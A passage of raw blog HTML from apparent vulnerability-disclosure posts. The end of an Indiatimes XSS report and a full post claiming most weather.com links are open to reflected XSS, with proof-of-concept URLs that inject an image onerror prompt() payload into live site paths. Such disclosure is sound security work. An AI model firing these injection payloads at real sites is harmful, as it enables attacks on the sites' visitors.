<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be">https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html">http://securityrelated.blogspot.com/2014/11/two-topics-of-indiatimes-indiatimescom.html</a></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>What is XSS?</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">"Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it." (OWASP)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerabilities were reported to Indiatimes in early September, 2014. However they are still unpatched.</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Discovered and Reported by:</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558910457235251201">@justqdjing</a>)</span></div>
</div>
<div style="background-color: white;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Related Articles:</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://seclists.org/fulldisclosure/2014/Nov/91">http://seclists.org/fulldisclosure/2014/Nov/91</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://lists.openwall.net/full-disclosure/2014/11/27/6">http://lists.openwall.net/full-disclosure/2014/11/27/6</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1256">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1256</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://progressive-comp.com/?l=full-disclosure&m=141705615327961&w=1">https://progressive-comp.com/?l=full-disclosure&m=141705615327961&w=1</a></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/234603051201501352218524/">http://tetraph.blog.163.com/blog/static/234603051201501352218524/</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.techworm.net/2014/12/times-india-website-vulnerable-cross-site-scripting-xss-attacks.html">http://www.techworm.net/2014/12/times-india-website-vulnerable-xss</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://cxsecurity.com/issue/WLB-2014120004">https://cxsecurity.com/issue/WLB-2014120004</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://vulnerabilitypost.wordpress.com/2014/12/04/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">https://vulnerabilitypost.wordpress.com/2014/12/04/indiatimes-xss</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://diebiyi.com/articles/security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://diebiyi.com/articles/security/all-links-in-two-topics-of-indiatimes</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.inzeed.com/kaleidoscope/computer-security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://www.inzeed.com/kaleidoscope/computer-security/all-links-in-two-topics-of-indiatimes</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc6c9">http://itsecurity.lofter.com/post/1cfbf9e7_54fc6c9</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/12/all-links-in-two-topics-of-indiatimes.html">http://computerobsess.blogspot.com/2014/12/all-links-in-two-topics-of-indiatimes.html</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatview.tumblr.com/post/104310651681/times-of-india-website-vulnerable-to-cross-site-scr">http://whitehatview.tumblr.com/post/104310651681/times-of-india-website-vulnerable-to</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/computer-security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://www.tetraph.com/blog/computer-security/all-links-in-two-topics-of-indiatimes</a></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br class="Apple-interchange-newline" /></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-64404621652124574682015-06-20T02:11:00.000-07:002015-06-20T02:11:16.705-07:00The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Domain Description:</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">http://www.weather.com/</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">"The
Weather Channel is an American basic cable and satellite television
channel which broadcasts weather forecasts and weather-related news and
analyses, along with documentaries and entertainment programming related
to weather. Launched on May 2, 1982, the channel broadcasts weather
forecasts and weather-related news and analysis, along with
documentaries and entertainment programming related to weather."</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br />"As
of February 2015, The Weather Channel was received by approximately
97.3 million American households that subscribe to a pay television
service (83.6% of U.S. households with at least one television set),
which gave it the highest national distribution of any U.S. cable
channel. However, it was subsequently dropped by Verizon FiOS (losing
its approximately 5.5 millions subscribers), giving the title of most
distributed network to HLN. Actual viewership of the channel averaged
210,000 during 2013 and has been declining for several years. Content
from The Weather Channel is available for purchase from the NBCUniversal
Archives." (Wikipedia)</span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Vulnerability description:</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b><b><br /></b>The Weather Channel has a cyber security problem. Hacker can exploit it by XSS bugs.</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Almost
all links under the domain weather.com are vulnerable to XSS attacks.
Attackers just need to add script at the end of The Weather Channel's
URLs. Then the scripts will be executed.</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">10
thousands of Links were tested based a self-written tool. During the
tests, 76.3% of links belong to weather.com were vulnerable to XSS
attacks.</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The
reason of this vulnerability is that Weather Channel uses URLs to
construct its HTML tags without filtering malicious script codes. </span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #222222; font-family: arial, sans-serif; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The
vulnerability can be attacked without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.</span></span></div>
</div>
</div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /><span style="line-height: 19.6px; text-align: justify;"><br /></span></span></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmbUgNaqbf9cDviEklyRyi3r3hmgjxhtwvJh_TYA1hsRie0o4J9Twf2mjJnUWzT__PUBeNgfh3pCnUYdljLCj-jSLTtu3zFcdWcnXZr_4937NzH17JAZQ6sR1NTz4F8SJlj53sJHSLMnU/s1600/weather_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmbUgNaqbf9cDviEklyRyi3r3hmgjxhtwvJh_TYA1hsRie0o4J9Twf2mjJnUWzT__PUBeNgfh3pCnUYdljLCj-jSLTtu3zFcdWcnXZr_4937NzH17JAZQ6sR1NTz4F8SJlj53sJHSLMnU/s1600/weather_1_xss.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /></span></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLaFJzHXMwWhm9d0ecnFZk-Z5j9OubSRed36PRqp5qFkpRHg1fupC7sTZP8ZW9JNybZVDGAsN0mtkwv2qdk4isTmDVnt-DrrliN0-mcCdDYoBpvWJ6gNgQG_NcX5XwJkgxQ2guUnlF0-M/s1600/weather_2_xx.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLaFJzHXMwWhm9d0ecnFZk-Z5j9OubSRed36PRqp5qFkpRHg1fupC7sTZP8ZW9JNybZVDGAsN0mtkwv2qdk4isTmDVnt-DrrliN0-mcCdDYoBpvWJ6gNgQG_NcX5XwJkgxQ2guUnlF0-M/s1600/weather_2_xx.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes, e.g.</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.weather.com/slideshows/main/" target="_blank">http://www.weather.com/<wbr></wbr>slideshows/main/</a>"--/>"><img src=x onerror=prompt('justqdjing')></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.weather.com/home-garden/home/white-house-lawns-20140316%22--/" target="_blank">http://www.weather.com/home-<wbr></wbr>garden/home/white-house-lawns-<wbr></wbr>20140316%22--/</a>"--/>"><img src=x onerror=prompt('justqdjing')><wbr></wbr>t%28%27justqdjing%27%29%3E</span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.weather.com/news/main/" target="_blank">http://www.weather.com/news/<wbr></wbr>main/</a>"><img src=x onerror=prompt('justqdjing')></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be">https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/the-weather-channel-weather.html">http://securityrelated.blogspot.com/2014/11/the-weather-channel-weather.html</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
